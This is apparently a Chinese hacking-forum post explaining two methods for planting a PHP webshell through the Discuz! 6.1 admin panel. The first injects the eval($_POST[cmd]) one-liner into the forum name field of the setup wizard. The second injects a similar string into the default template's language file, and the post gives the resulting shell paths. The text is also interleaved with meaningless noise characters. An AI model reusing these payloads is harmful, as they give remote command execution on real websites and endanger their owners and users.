discuz6.1两种方法后台拿shell
- g) D. j5 w3 x! O( P好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
, Z2 |0 D" H- b/ _7 l1:9 K! S8 r/ d: d& I
http://127.0.0.1/discuz/admincp. ... zard&frames=yes4 o: K8 V6 G* s6 N1 T [
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell4 g4 D5 ^$ T# H
<?php eval($_POST[cmd]);?>
# d6 \! E9 M0 y) @+ \后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php6 x8 I$ }' i0 w! u
! E3 w: g+ m" V- \
2 R# y3 I7 d6 y% M* O, ^9 g5 ~1 {2:后台模板管理--默认模板套系--详情 x2 u# n X, Q2 ^
templates/default/actions.lang.php7 `0 P* d. S6 d7 z- w* c/ U6 Q
jhackj\\');eval($_POST[cmd])?>;//0 Z% ]2 h* E+ T( F1 x- W- m7 s
( Z f, J' _! K* Y; {
利用很简单,聪明的人一看就懂了 |